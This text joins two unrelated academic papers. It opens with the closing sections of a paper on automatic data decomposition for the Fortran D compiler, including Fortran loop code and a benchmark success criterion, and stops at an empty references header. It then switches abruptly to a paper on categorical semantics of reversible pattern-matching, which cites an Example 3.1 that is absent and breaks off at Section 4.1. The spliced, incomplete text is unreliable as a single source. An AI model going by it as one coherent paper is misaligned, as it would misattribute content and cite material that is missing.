The call graph is first traversed in topological order to propagate loop information into called procedures. This information is needed to identify single computation phases. Subsequently, the call graph is traversed in reverse topological order. For each procedure P the single-source shortest paths problem is solved on its phase control flow graph using the hierarchical approach of algorithm DECOMP in Figure 11. Each call site of P in procedure Q is represented by a copy of the interval summary phase of P in the phase control flow graph of Q. The information about the computed data decomposition schemes with their realignment and redistribution points is passed to the Fortran D compiler. The automatic data partitioner cannot insert the Fortran D data layout statements directly into the program, since it does not actually perform the cloning of procedures. If the compiler does not perform cloning, a procedure can have only a single entry and exit decomposition scheme. The automatic data partitioner will then use a heuristic to select the decomposition scheme.
The heuristic takes the static execution count of call sites and the penalties due to mismatched decomposition schemes into account. Using the outlined strategy the automatic system generates the same decomposition, alignment, and distribution for the programs of Figure 3 and Figure 12. 5 Success/Failure Criterion The feasibility of the proposed automatic techniques depends on the ‘quality’ of the generated decomposition schemes compared to schemes that are considered optimal. We want to define our quality measure prior to an investigation into automatic techniques. This will guarantee an unbiased discussion of results gained by an empirical study. We will use a benchmark suite being developed by Geoffrey Fox at Syracuse that consists of a collection of Fortran programs. Each program in the suite will have five versions: - (v1) the original Fortran 77 program, - (v2) the best hand-coded message-passing version of the Fortran program, - (v3) a “nearby” Fortran 77 program, - (v4) a Fortran D version of the nearby program, and - (v5) a Fortran 90 version of the program. The “nearby” version of the program will utilize the same basic algorithm as the message-passing program, except that all explicit message-passing and blocking of loops in the program are removed. The Fortran D version of the program consists of the nearby version plus appropriate data decomposition specifications. To validate the automatic data partitioner, we will use it to generate a Fortran D program from the nearby Fortran program (v3). The result will be compiled by the Fortran D compiler and its running time compared with that of the compiled version of the hand-generated Fortran D program (v4). Our goal is that for 80% of the benchmark programs the nearby version with automatically generated data layout will run at most 20% slower than the hand-generated Fortran D program. We expect that such a performance degradation due to automatic data decomposition is still acceptable to the user. 
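The 80%/20% success criterion can be written down directly. A minimal sketch, assuming the measured running times of the automatically decomposed versions and the hand-written Fortran D versions are available as parallel lists:

```python
# Success criterion: for at least `fraction` of the benchmark programs,
# the automatically decomposed version must run at most `slowdown` slower
# than the hand-written Fortran D version.

def meets_goal(auto_times, hand_times, slowdown=0.20, fraction=0.80):
    """True if the automatic data partitioner meets the stated goal."""
    ok = sum(1 for a, h in zip(auto_times, hand_times)
             if a <= (1 + slowdown) * h)
    return ok >= fraction * len(auto_times)
```

Note that the criterion is per-program, not aggregate: one badly decomposed benchmark cannot be hidden by large wins elsewhere, which matches the intent of bounding the degradation a user may see.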
We believe that in many cases it is easy for the user to specify the problem mapping, i.e. the data alignment onto a decomposition, since the problem mapping is determined by the structure of the underlying algorithm. However, the user will have difficulty predicting the combined effects of the compiler, problem, and machine characteristics on the performance of a specified data decomposition scheme. Therefore we expect the Fortran D program generated by the automatic data partitioner to do better than the hand-coded Fortran D version for some programs of the benchmark suite. Initially, the automatic techniques will be validated by applying them to whole programs in the benchmark suite. If the automatic techniques fail for whole programs, we want to understand why this is the case and how user interaction can overcome their deficiencies.

      DOUBLE PRECISION v(N,N), a, b
      DECOMPOSITION d(N,N)
      ALIGN v(I,J) WITH d(I,J)
      DISTRIBUTE d(BLOCK,BLOCK)
      DO k = 1, M
C        Compute the red points
         CALL redpoints (v,a,b,N)
C        Compute the black points
         CALL blackpoints (v,a,b,N)
      ENDDO

      SUBROUTINE redpoints (v,a,b,n)
      INTEGER n
      DOUBLE PRECISION v(n,n), a, b
      DO j = 1, N, 2
         DO i = 1, N, 2
            v(i,j) = a*(v(i,j-1) + v(i-1,j) + v(i,j+1) + v(i+1,j)) + b*v(i,j)
         ENDDO
      ENDDO
      DO j = 2, N, 2
         DO i = 2, N, 2
            v(i,j) = a*(v(i,j-1) + v(i-1,j) + v(i,j+1) + v(i+1,j)) + b*v(i,j)
         ENDDO
      ENDDO
      END

      SUBROUTINE blackpoints (v,a,b,n)
      INTEGER n
      DOUBLE PRECISION v(n,n), a, b
      DO j = 1, N, 2
         DO i = 2, N, 2
            v(i,j) = a*(v(i,j-1) + v(i-1,j) + v(i,j+1) + v(i+1,j)) + b*v(i,j)
         ENDDO
      ENDDO
      DO j = 2, N, 2
         DO i = 1, N, 2
            v(i,j) = a*(v(i,j-1) + v(i-1,j) + v(i,j+1) + v(i+1,j)) + b*v(i,j)
         ENDDO
      ENDDO
      END

Figure 12: Example loop nest with procedure calls.

6 Related Work and Research Goals

Our proposed techniques for automatic data decomposition are based on previous work done by 1. Knobe, Lukas at Compass, Steele at Thinking Machines Corporation, and Natarajan at Motorola [KLS90, KN90], 2.
Li, Chen, and Choo for the Crystal project at Yale University [CCL89, LC90a, LC91b, LC91a, LC90b], and 3. Balasundaram, Fox, Kennedy, and Kremer at Caltech and Rice University in the context of the Fortran D distributed-memory compiler and environment project [FHK+90, HKT92b, HKT91, HHKT91, BFKK90, BFKK91, HKK+91].

Knobe, Lukas, Natarajan, and Steele deal with the problem of automatic data layout for SIMD architectures such as the Connection Machine. They discuss an algorithm that uses heuristics to resolve conflicting requirements between minimizing communication and maximizing parallelism. They also observed the problem of data replication for arrays that are used solely as temporaries.

Li, Chen, and Choo discuss automatic data decomposition in the context of a functional language. They introduce the notion of index domains for phases of the computation. After alignment, i.e. mapping data objects or functions into the common index domain of the phase, the functional program is transformed into an imperative, intermediate form. Data partitioning is defined on the data objects of the intermediate program and is specified by the user at execution time of the program. Li, Chen, and Choo also briefly discuss ideas for automatic data partitioning: given a data partitioning strategy, a performance model is used to determine optimal communication, selecting efficient collective communication routines whenever possible. In contrast to the Crystal project, the input to our system is an imperative language, namely Fortran. Since Crystal starts out with a functional program, many functional characteristics are still present in the imperative, intermediate code.

Balasundaram, Fox, Kennedy, and Kremer proposed an interactive performance estimation tool that helps the user understand the effects of a user-specified decomposition with respect to communication time and overall execution time [BFKK90], without actually compiling and executing the program.
The described techniques are based on knowledge of the compiler, the actual problem size, and the number of processors to be used. In [BFKK91], techniques are discussed that allow static performance estimation with high accuracy for a large class of loosely synchronous problems.

Some approaches to automatic data decomposition concentrate on single loop nests. The iteration space is first partitioned into sets of iterations that can be executed independently; the data mapping is then determined by the iterations that are assigned to the different processors [RS89, Ram90, D'H89, KKB91]. Other techniques for single loop nests are based on recognizing specific computation patterns in the loop, called stencils [SS90, HA90, IFKF90, GAY91]. This more abstract representation is used to find a good data mapping.

Our approach to automatic data alignment and distribution is closely related to the work done by Gupta and Banerjee at the University of Illinois at Urbana-Champaign [GB90, GB91, GB92], Wholey at Carnegie Mellon University [Who91], and Chapman, Herbeck, and Zima at the University of Vienna [CHZ91]. The described techniques for automatic data decomposition work on whole programs, taking machine characteristics and problem characteristics into account. In these approaches, the automatic data partitioner is an integral part of the compiler.

The major contributions of our research are

1. the development of new techniques for automatic data alignment and distribution; these techniques consider realignment, redistribution, and data replication to minimize communication or enhance the available parallelism in the program, and have to account for procedure calls and control flow;
2. the design of a portable automatic data decomposition tool that achieves compiler and machine independence by using compiler-level and machine-level training sets;
3. the validation of the new techniques using a suite of benchmark programs; and
4.
the answer to the question of whether there is a data parallel programming style that allows automatic data decomposition of regular loosely synchronous programs across a variety of distributed-memory machines.

The proposed automatic techniques will be implemented as part of the ParaScope parallel programming environment adapted to distributed-memory multiprocessors [BKK+89, KMT91, BFKK90, HKK+91]. A prototype of the machine module of the static performance estimator is already available [BFKK91].

7 Acknowledgements

We wish to thank Seema Hiranandani and Chau-Wen Tseng for many discussions and helpful comments on the content of this paper. Many thanks also to Joe Warren for his comments and ideas, and to the ParaScope research group for providing the underlying software infrastructure for the Fortran D programming system.

References
Categorical Semantics of Reversible Pattern-Matching

Kostia Chardonnet
Université Paris-Saclay, CNRS, ENS Paris-Saclay, LMF, 91190, Gif-sur-Yvette, France
Université de Paris, CNRS, IRIF, F-75006, Paris, France

Louis Lemonnier
Université Paris-Saclay, CNRS, ENS Paris-Saclay, LMF, 91190, Gif-sur-Yvette, France

Benoît Valiron
Université Paris-Saclay, CNRS, CentraleSupélec, ENS Paris-Saclay, LMF, 91190, Gif-sur-Yvette, France

Abstract

This paper is concerned with categorical structures for reversible computation. In particular, we focus on a typed, functional reversible language based on Theseus. We discuss how join inverse rig categories do not in general capture pattern-matching, the core construct Theseus uses to enforce reversibility. We then derive a categorical structure to add to join inverse rig categories in order to capture pattern-matching. We show how such a structure makes an adequate model for reversible pattern-matching.

Keywords: Reversible Computation, Category Theory.

1 Introduction

In this paper, we are concerned with the semantics of reversible programming languages. The idea of reversible computation goes back to Landauer and Bennett [1,2], with the analysis of its expressivity and of the relationship between irreversible computing and dissipation of energy. This led to an interest in reversible computation [3,4], both from a low-level approach [5,6,7] and from a high-level perspective [8,9,10,11,12,13,14,15,16]. Reversible programming lies on the latter side of the spectrum, and two main approaches have been followed. Embodied by Janus [8,9,17,10] and later R-CORE and R-WHILE [18], the first one focuses on imperative languages whose control flow is inherently reversible; the main issue in this setting is tests and loops. The other approach is concerned with the design of functional languages with structured data and related case-analysis, or pattern-matching [14,15,12,13,16].
To ensure reversibility, strong constraints have to be imposed on the pattern-matching. In general, reversible computation captures partial injective maps [18] from inputs to outputs or, equivalently in this paper, partial isomorphisms. Indeed, from a computational perspective reversibility is understood as a time-local property: if each time-step of the execution of the computation can soundly be reversed, there is no overall condition on the global behavior of the computation. In particular, this does not say anything about termination: a computation seen as a map from inputs to outputs might very well be partial, as some inputs may trigger a (global) non-terminating behavior.

The categorical analysis of partial injective maps has been thoroughly developed since 1979, first by Kastl [19] and then by Cockett and Lack [20,21,22]. This led to the development of inverse categories: categories equipped with an inverse operator in which all morphisms have partial inverses and are therefore reversible. The main aspect of this line of research is that partiality can have a purely algebraic description: one can introduce a restriction operator on morphisms, associating to a morphism a partial identity on its domain.

This paper will be published in the proceedings of MFPS XXXVII. URL: https://www.coalg.org/calco-mfps2021/mfps/

This categorical framework has recently been put to use to develop the semantics of specific reversible programming constructs and concrete reversible languages: analysis of recursion in the context of reversibility [23,24,25], formalization of reversible flowchart languages [26,27], analysis of side-effects [28,29], etc. Interestingly enough, however, the adequacy of the developed categorical constructs with reversible functional programming languages has seldom been studied. For instance, although Kaarsgaard et al. [30] mention Theseus as a potential use case, they do not discuss it in detail.
So far, the semantics of functional and applicative reversible languages has always been given in concrete categories of partial isomorphisms [25,31]. In particular, one important aspect that has not yet been addressed in detail is the categorical interpretation of pattern-matching. If pattern-matching can be added to reversible imperative languages [18], it is particularly relevant in the context of functional languages, where it is one of the core constructs needed for manipulating structured data. This is for instance emphasized by the several existing languages making use of it [14,15,12,16,13,32]. In the literature, pattern-matching has either been considered in the context of a Set-based semantics [18], or more generally in categorical models making heavy use of rig structures [33] or coproducts [25,31] to represent it. While such rich structures are clearly sufficient to capture pattern-matching, we claim that they are too coarse, and that a weaker structure is enough to characterize pattern-matching.

Contributions. In this paper, we make a proposal for a general categorical interpretation of pattern-matching in the context of inverse categories, without having to rely on external structure such as coproducts. More specifically, we study the categorical semantics of a typed, linear and reversible language in the style of Theseus [12]. We develop and discuss pattern-matching categories: a categorical construction shown to be sufficient to model the pattern-matching at the heart of the operational semantics of the language. In particular, in this category we can mimic the notion of clauses and of values to be matched against them, without having to rely on coproducts. We conclude the paper with a proof that pattern-matching categories make adequate models for the considered language, thus confirming the validity of the approach.
This paper is organized as follows: first, in Section 2, we present the language based on [13], its type system and rewriting system, along with the usual safety properties. We then give a reminder on inverse categories and set up the theoretical background for the rest of the paper in Section 3. Basic knowledge of category theory is assumed. Finally, Sections 4 and 5 are focused on the categorical semantics of the language. The proofs are available in the appendix.

2 The language

In this section, we present a small, formal reversible functional programming language in the style of Theseus [12] and its later developments [13,32]. The core feature of Theseus is to define reversible control-flow using pattern-matching. Doing so elegantly bridges functional programming and reversible computation in a typed manner: well-typed, terminating programs describe isomorphisms between types. In previous —untyped— approaches [14], pattern-matching was simply considered as one language feature among many, without any special attention devoted to it, and the reversible aspect was taken care of separately. On the contrary, Theseus uses pattern-matching as the core feature that makes the language reversible. In the context of typed pattern-matching, the compiler can easily verify two crucial properties: (i) non-overlapping patterns in clauses, ensuring deterministic behavior, and (ii) exhaustive coverage of a datatype by the patterns, ensuring totality. In [13], these properties are shown sufficient to produce a simple first-order reversible programming language. In this paper we relax the constraints on exhaustivity, making it possible to define partial functions.

2.1 Terms and Types

The language we focus on in this paper is a weakened version of the language presented in [13, Sec. 2]. In particular, we allow non-exhaustive pattern-matching and enum types. The language is typed and consists of two layers: values and functions (called "isos" in [13]).
It is parametrized by a set of enum types (spanned by \( \alpha \)) and their constant values (spanned by \( c_\alpha \)). The language whose only type \( \alpha \) is the unit-type with one single unit constant will be called the minimal language.

\[
\begin{align*}
\text{(Value types)} & \quad a, b ::= \alpha \mid a \oplus b \mid a \otimes b \\
\text{(Iso types)} & \quad T ::= a \leftrightarrow b \\
\text{(Values)} & \quad v ::= c_\alpha \mid x \mid \text{inj}_l\, v \mid \text{inj}_r\, v \mid \langle v_1, v_2 \rangle \\
\text{(Functions)} & \quad \omega ::= \{ v_1 \leftrightarrow v'_1 \mid \ldots \mid v_n \leftrightarrow v'_n \} \\
\text{(Terms)} & \quad t ::= v \mid \omega\, t
\end{align*}
\]

The language comes with two kinds of judgments, one for terms and one for functions (or isos). We denote typing contexts as \( \Delta \); they stand for sets of typed variables \( x_1 : a_1, \ldots, x_n : a_n \). We then write \( \Delta \vdash v : a \) for a well-typed term and \( \vdash_\omega \omega : a \leftrightarrow b \) for a well-typed function. Beside the linearity aspect (used to ensure injectivity), the typing rules for terms are standard. The typing judgment of a term is valid if it can be derived from the following rules.

\[
\frac{}{\vdash c_\alpha : \alpha}
\qquad
\frac{}{x : a \vdash x : a}
\qquad
\frac{\Delta_1 \vdash v_1 : a \quad \Delta_2 \vdash v_2 : b}{\Delta_1, \Delta_2 \vdash \langle v_1, v_2 \rangle : a \otimes b}
\qquad
\frac{\Delta \vdash v : a}{\Delta \vdash \text{inj}_l\, v : a \oplus b}
\qquad
\frac{\Delta \vdash v : b}{\Delta \vdash \text{inj}_r\, v : a \oplus b}
\]

In particular, while a value can have free variables, a term is always closed. This difference is explained by the fact that values are used as patterns in clauses. The typing rule for isos is as follows.
\[
\frac{\Delta_1 \vdash v_1 : a \quad \Delta_1 \vdash v'_1 : b \quad \cdots \quad \Delta_n \vdash v_n : a \quad \Delta_n \vdash v'_n : b \qquad \forall i \neq j,\; v_i \perp v_j \qquad \forall i \neq j,\; v'_i \perp v'_j}{\vdash_\omega \{ v_1 \leftrightarrow v'_1 \mid \ldots \mid v_n \leftrightarrow v'_n \} : a \leftrightarrow b}
\]

The rule relies on the condition that both the left- and the right-hand-side patterns of the clauses are pairwise orthogonal, enforcing non-overlapping. The rules for deriving orthogonality of values (or patterns) are the following.

\[
\frac{c_\alpha \neq d_\alpha}{c_\alpha \perp d_\alpha}
\qquad
\frac{}{\text{inj}_l\, v \perp \text{inj}_r\, w}
\qquad
\frac{v \perp w}{\text{inj}_l\, v \perp \text{inj}_l\, w}
\qquad
\frac{v \perp w}{\text{inj}_r\, v \perp \text{inj}_r\, w}
\qquad
\frac{v_1 \perp w_1}{\langle v_1, v_2 \rangle \perp \langle w_1, w_2 \rangle}
\qquad
\frac{v_2 \perp w_2}{\langle v_1, v_2 \rangle \perp \langle w_1, w_2 \rangle}
\]

Left and right injections generate disjoint subsets of values, and distinct constants of an enum type \( \alpha \) are orthogonal.

2.2 Operational semantics

The language is equipped with a simple call-by-value operational semantics on terms, based on matching and substitution. We recall the formalization proposed in [13], with the notion of valuation: a partial map from a finite set of variables (the support) to a set of values. We denote the matching of a value \( w \) against a pattern \( v \) and its associated valuation \( \sigma \) as \( \sigma[v] = w \). It is defined as follows.
\[
\frac{}{\emptyset[c_\alpha] = c_\alpha}
\qquad
\frac{}{\{x \mapsto w\}[x] = w}
\qquad
\frac{\sigma[v] = w}{\sigma[\text{inj}_l\, v] = \text{inj}_l\, w}
\qquad
\frac{\sigma[v] = w}{\sigma[\text{inj}_r\, v] = \text{inj}_r\, w}
\]
\[
\frac{\sigma_1[v_1] = w_1 \quad \sigma_2[v_2] = w_2 \quad \text{supp}(\sigma_1) \cap \text{supp}(\sigma_2) = \emptyset \quad \sigma = \sigma_1 \cup \sigma_2}{\sigma[\langle v_1, v_2 \rangle] = \langle w_1, w_2 \rangle}
\]

Whenever \( \sigma \) is a valuation whose support contains the variables of \( v \), we write \( \sigma(v) \) for the value where the variables of \( v \) have been replaced with the corresponding values in \( \sigma \), as follows:

- \( \sigma(c_\alpha) = c_\alpha \),
- \( \sigma(x) = w \) if \( \{ x \mapsto w \} \subseteq \sigma \),
- \( \sigma(\text{inj}_l\, v) = \text{inj}_l\, \sigma(v) \),
- \( \sigma(\text{inj}_r\, v) = \text{inj}_r\, \sigma(v) \),
- \( \sigma(\langle v_1, v_2 \rangle) = \langle \sigma(v_1), \sigma(v_2) \rangle \).

**Definition 2.1 (Reduction)** The reduction \( \to \) is then defined as the smallest relation such that \( \omega\, t \to \omega\, t' \) whenever \( t \to t' \), and such that, provided that \( \sigma[v_i] = v \), the redex
\[
\{ v_1 \leftrightarrow v'_1 \mid \ldots \mid v_n \leftrightarrow v'_n \}\; v
\]
reduces to \( \sigma(v'_i) \). As usual, we write \( s \to t \) to say that \( s \) rewrites in one step to \( t \) and \( s \to^* t \) to say that \( s \) rewrites to \( t \) in 0 or more steps.

2.3 Properties

The language satisfies the usual safety properties, and, although not necessarily total, functions are indeed reversible. In this section we formalize these results.

**Remark 2.2** The reduction is deterministic: if \( s \to t \) and \( s \to t' \) then \( t = t' \). Indeed, because of the conditions set on patterns in the typing rule of isos, at most one clause can match a given value. Note that, since we do not impose exhaustivity, the reduction might get stuck. Nonetheless, the following properties hold [13].

**Lemma 2.3 (Subject reduction)** If \( \vdash_v s : a \) and \( s \to t \) then \( \vdash_v t : a \). □
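The matching and reduction machinery above is easy to make executable. The following is a minimal sketch, assuming a hypothetical encoding of values as tagged Python tuples; none of these names come from the paper.

```python
# Hypothetical value encoding (ours, for illustration only):
#   ("const", c)              enum constant
#   ("var", x)                variable
#   ("injl", v), ("injr", v)  left/right injections
#   ("pair", v1, v2)          tensor pairs

def orthogonal(v, w):
    """The orthogonality judgment v ⊥ w of Section 2.1."""
    if v[0] == "const" and w[0] == "const":
        return v[1] != w[1]                       # distinct constants
    if {v[0], w[0]} == {"injl", "injr"}:
        return True                               # opposite injections
    if v[0] == w[0] and v[0] in ("injl", "injr"):
        return orthogonal(v[1], w[1])
    if v[0] == "pair" and w[0] == "pair":
        return orthogonal(v[1], w[1]) or orthogonal(v[2], w[2])
    return False                                  # variables overlap with everything

def match(pattern, value):
    """Return the valuation σ with σ[pattern] = value, or None if matching fails."""
    kind = pattern[0]
    if kind == "const":
        return {} if pattern == value else None
    if kind == "var":
        return {pattern[1]: value}
    if kind in ("injl", "injr"):
        return match(pattern[1], value[1]) if value[0] == kind else None
    if kind == "pair":
        if value[0] != "pair":
            return None
        s1, s2 = match(pattern[1], value[1]), match(pattern[2], value[2])
        if s1 is None or s2 is None or set(s1) & set(s2):
            return None                           # supports must be disjoint
        return {**s1, **s2}

def subst(sigma, v):
    """σ(v): replace the variables of v by their values in σ."""
    if v[0] == "const":
        return v
    if v[0] == "var":
        return sigma[v[1]]
    if v[0] == "pair":
        return ("pair", subst(sigma, v[1]), subst(sigma, v[2]))
    return (v[0], subst(sigma, v[1]))

def apply_iso(clauses, value):
    """One reduction step of Definition 2.1; raises on stuck (non-exhaustive) terms."""
    for lhs, rhs in clauses:
        sigma = match(lhs, value)
        if sigma is not None:
            return subst(sigma, rhs)
    raise ValueError("stuck: no clause matches")
```

By orthogonality of the left-hand sides, at most one clause can match, which is the determinism of Remark 2.2.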
**Lemma 2.4 (Termination)** If \( \vdash_v s : a \) then there exists a term \( t \) that does not reduce such that \( s \to^* t \). □

The small language presented in this section can therefore be called reversible.

3 Inverse categories

The category \( \text{PInj} \) of sets and partial injective functions has been extensively studied, and its structure analyzed within the framework of inverse categories [19,20,21,22,34,35]. These categories formalize the notion of partial inverses of morphisms; they also convey a natural definition of joins —least upper bounds— without relying on coproducts, which shall be shown to be the right way to denote pattern-matching, as discussed in Example 3.1. This section therefore aims at a rapid introduction to inverse categories. It contains the necessary material needed to read and understand the remaining sections, but it is far from stating all the results and interests of restriction and inverse categories. A reader interested in the subject may for instance refer to [20,21,22,34,35] for further information.

3.1 Restriction category

The definition of a proper partial function requires a formal way to express the "domain" of a morphism \( f \), through a partial identity \( \overline{f} \) called its restriction.

**Definition 3.2 (Restriction [20])** A restriction structure is an operator that maps each morphism \( f : A \to B \) to a morphism \( \overline{f} : A \to A \) such that, whenever the compositions are defined,

\[
f \circ \overline{f} = f \quad (2)
\qquad
\overline{f} \circ \overline{g} = \overline{g} \circ \overline{f} \quad (3)
\qquad
\overline{g \circ \overline{f}} = \overline{g} \circ \overline{f} \quad (4)
\qquad
\overline{h} \circ f = f \circ \overline{h \circ f} \quad (5)
\]

A morphism \( f \) is said to be total if \( \overline{f} = 1_A \). A category with a restriction structure is called a restriction category.
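In a category of finite partial functions, the four axioms can be checked mechanically. Below, a partial function is encoded as a Python dict; this is an illustration under our own encoding, not a construction from the paper.

```python
def compose(g, f):
    """g ∘ f on finite partial functions encoded as dicts."""
    return {x: g[f[x]] for x in f if f[x] in g}

def bar(f):
    """The restriction f̄: the partial identity on the domain of f."""
    return {x: x for x in f}

# Sample partial functions with common domain object A = {1, 2, 3}:
f = {1: "a", 2: "b"}        # f  : A → B
f2 = {2: "x", 3: "y"}       # f2 : A → C
g = {"a": True}             # g  : B → D

assert compose(f, bar(f)) == f                               # axiom (2)
assert compose(bar(f), bar(f2)) == compose(bar(f2), bar(f))  # axiom (3)
assert bar(compose(f2, bar(f))) == compose(bar(f2), bar(f))  # axiom (4)
assert compose(bar(g), f) == compose(f, bar(compose(g, f)))  # axiom (5)
```

Note that `f` needs not be injective here: Pfn, not PInj, is the ambient category at this stage.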
**Remark 3.3** When unambiguous, we write \( gf \) for the composition \( g \circ f \).

**Example 3.4** Any category can be given a restriction structure by declaring all morphisms total, but this is definitely not interesting as a model. The standard non-trivial example of a restriction category is \( \text{Pfn} \), the category of sets and partial functions. Given a partial function \( f : A \to B \), its restriction is defined by \( \overline{f}(x) = x \) on the domain of \( f \), and is undefined otherwise.

Throughout this paper, we manipulate functors. These are often required to keep the restriction structure intact; hence the following definition.

**Definition 3.5 (Restriction functor [30])** A functor \( F : C \to D \) is a restriction functor if \( F(\overline{f}) = \overline{F(f)} \) for every morphism \( f \) of \( C \). The definition is canonically extended to bifunctors.

3.2 Inverse category

Our goal is to denote reversible operations: this requires some form of inverse. The restriction operator gives a notion of domain of morphisms; moreover, \( \overline{f} \) is meant as an identity function on this domain. Thus the composition of \( f \) with its presumed inverse should be equal to its restriction. Hence the next definition. Note that inverse categories were invented [19] before restriction categories, but the order of definitions used here is believed more convenient by the authors.

**Definition 3.6 (Inverse category [30])** An inverse category is a restriction category where all morphisms are partial isomorphisms, meaning that for \( f : A \to B \) there exists a unique \( f^\circ : B \to A \) such that \( f^\circ \circ f = \overline{f} \) and \( f \circ f^\circ = \overline{f^\circ} \).

The canonical example of an inverse category is \( \text{PInj} \), the category of sets and partial injective functions. It is actually more than canonical:

**Theorem 3.7 ([19])** Every locally small inverse category is isomorphic to a subcategory of \( \text{PInj} \).
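In finite \( \text{PInj} \), the partial inverse of Definition 3.6 is directly computable; a sketch with our dict encoding of partial injections (an illustration, not part of the paper):

```python
def compose(g, f):
    """g ∘ f on finite partial injections encoded as dicts."""
    return {x: g[f[x]] for x in f if f[x] in g}

def bar(f):
    """f̄: the partial identity on dom(f)."""
    return {x: x for x in f}

def inv(f):
    """The unique partial inverse f° of Definition 3.6 (f must be injective)."""
    assert len(set(f.values())) == len(f), "not a partial injection"
    return {y: x for x, y in f.items()}
```

With `f = {1: "a", 2: "b"}`, one can check both defining equations: `compose(inv(f), f)` equals `bar(f)`, and `compose(f, inv(f))` equals `bar(inv(f))`.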
**Example 3.8** Let us fix a non-empty set \( S \). We define \( \text{PId}_S \) as the category with one object \( * \) and with morphisms all the subsets \( Y \subseteq S \). Composition is given by intersection and the identity is \( S \). Intersection also gives a monoidal structure with unit \( S \). Note that the category \( \text{PId}_S \) can be regarded as a subcategory of \( \text{PInj} \), where each morphism \( Y \subseteq S \) corresponds to the partial identity defined on \( Y \). The category \( \text{PId}_S \) can be endowed with a structure of inverse category by defining each morphism as its own restriction and partial inverse.

From \( \text{PId}_S \) we can define \( \text{PId}_S^\circ \) as the inverse category whose objects are (generic) sets, and whose morphisms are defined as follows: \( f : A \to B \) is a pair \( f = (\sigma_f, \{X^f_a\}_{a \in \text{dom}(\sigma_f)}) \) where \( \sigma_f \) is a partial injective map between the sets \( A \) and \( B \), and where each \( X^f_a \) is a morphism of \( \text{PId}_S \). Composition in \( \text{PId}_S^\circ \) is done pairwise, with the usual composition of partial functions for the \( \sigma \) component and the composition of \( \text{PId}_S \) for the other one. The identity over \( A \) is the pair made of the set-identity on \( A \) together with \( S \) for each \( a \in A \). The restriction and partial inverse are obtained componentwise from those of \( \text{PInj} \) and \( \text{PId}_S \).

3.3 Compatibility

To give a denotation to isos in the programming language considered in Section 2, it is compulsory to find a way to combine terms such as \( \omega_1 \) and \( \omega_2 \) in Example 3.1. More generally speaking, we need to combine morphisms of the same type \( A \to B \) into a "join" morphism. First, we have to make sure that the morphisms are compatible: \( f \) and \( g \) are compatible if they agree on their common "domain", and can behave however they like where the other one is undefined.
Since we aim at building a model of (partial) bijections, compatibility of the partial inverses is also checked.

**Definition 3.9 (Restriction compatible [30])** Two morphisms \( f, g : A \to B \) in a restriction category \( C \) are restriction compatible if \( f \overline{g} = g \overline{f} \). The relation is written \( f \sim g \). If \( C \) is an inverse category, they are inverse compatible if \( f \sim g \) and \( f^\circ \sim g^\circ \), written \( f \bowtie g \). A set \( S \) of morphisms of the same type \( A \to B \) is restriction compatible (resp. inverse compatible) if all elements of \( S \) are pairwise restriction compatible (resp. inverse compatible).

**Example 3.10** In \( \text{PInj} \), let us consider \( f, g : \{a, b, c\} \to \{a, b, c\} \), defined as the identities on their respective domains \( \text{dom}(f) = \{a, b\} \) and \( \text{dom}(g) = \{b, c\} \). It is clear that \( f \bowtie g \). However, if we consider \( h : \{a, b, c\} \to \{a, b, c\} \) defined on \( \{b, c\} \) by \( h(b) = a \) and \( h(c) = c \), then \( f \) and \( h \) are not compatible.

3.4 Joins and ordering on morphisms

When considering partial set-functions, a natural notion of order can be built on functions by considering domain inclusion: we can say that \( f \leq g \) if \( g \) is defined on the whole "domain" of \( f \) and both behave the same there. When considering models of reversible languages, joins are used to model pattern-matching [34,31]: each clause is a partial function, and the complete pattern-matching can then be represented as the join of the clauses. This notion can be extended to restriction categories as follows.

**Definition 3.11 (Partial order [20])** Let \( f, g : A \to B \) be two morphisms in a restriction category. We then define \( f \leq g \) as \( g \overline{f} = f \).

**Example 3.12** Consider \( \text{PId}_S \) from Example 3.8: we have \( X \leq Y \) iff \( X \subseteq Y \).
For \( \text{PId}_S^\circ \), we have \( f \leq g \) iff \( \text{dom}(\sigma_f) \subseteq \text{dom}(\sigma_g) \) and, for all \( a \in \text{dom}(\sigma_f) \), \( \sigma_f(a) = \sigma_g(a) \) and \( X^f_a \subseteq X^g_a \).

**Proposition 3.13** Let us consider \( f, g : A \to B \) such that \( f \leq g \). Then, whenever \( h : B \to C \), we have \( hf \leq hg \). Similarly, whenever \( h : C \to A \), we have \( fh \leq gh \).

As discussed in Example 3.1, the isos \( \omega_1 \) and \( \omega_2 \) can be combined to form the "join" morphism \( \omega \). This notion of join is defined in the context of restriction categories as follows.

**Definition 3.14 (Joins [35])** A restriction category \( C \) is equipped with joins if for all restriction compatible sets \( \mathcal{S} \) of morphisms \( A \to B \), there exists a morphism \( \bigvee \mathcal{S} : A \to B \) of \( C \) such that, for all \( t : A \to B \) and all composable \( f \) and \( g \):

\[
\begin{align*}
& \forall s \in \mathcal{S},\; s \leq \bigvee \mathcal{S}, \qquad \text{and } \bigvee \mathcal{S} \leq t \text{ whenever } s \leq t \text{ for all } s \in \mathcal{S}; \\
& \overline{\bigvee \mathcal{S}} = \bigvee_{s \in \mathcal{S}} \overline{s}; \qquad
f \circ \bigvee \mathcal{S} = \bigvee_{s \in \mathcal{S}} f \circ s; \qquad
\Big( \bigvee \mathcal{S} \Big) \circ g = \bigvee_{s \in \mathcal{S}} s \circ g.
\end{align*}
\]

Such a category is called a join restriction category. An inverse category with joins is called a join inverse category.

**Example 3.15** Consider the morphisms \( f, g \) from Example 3.10. They are compatible, and \( f \vee g = 1_{\{a, b, c\}} \). It is easy to verify that e.g. \( f \leq 1_{\{a, b, c\}} \) and \( g \leq 1_{\{a, b, c\}} \). Let us now consider \( h, k, l : \{a, b, c\} \to \{a, b, c\} \) such that \( h(a) = b \) and is undefined otherwise, \( k(b) = c \) and is undefined otherwise, and \( l \) is defined by \( l(a) = b \), \( l(b) = c \) and \( l(c) = a \). We have \( h \leq l \) and \( k \leq l \).
Besides, \( h \vee k \) is the function whose domain is \( \{a, b\} \), sending \( a \mapsto b \) and \( b \mapsto c \). We therefore have \( h \vee k \leq l \).

The join operator admits a unit, as follows.

**Definition 3.16 (Zero [30])** Since \( \emptyset \subseteq \text{Hom}_C(A, B) \), and since all of its elements are trivially restriction compatible, there exists a morphism \( 0_{A,B} = \bigvee \emptyset \), called zero.

**Lemma 3.17 ([30])** Whenever well-typed, the zero satisfies the following equations: \( f \circ 0 = 0 \), \( 0 \circ g = 0 \), \( 0_{A,B}^\circ = 0_{B,A} \), \( \overline{0_{A,B}} = 0_{A,A} \).

4 Semantics of isos

In this section, we turn to the question of representing the terms and isos of the language presented in Section 2. Instead of using the concrete category \( \text{PInj} \), as suggested at the beginning of Section 3, we aim at using general inverse categories.

4.1 Representing choice and pairing

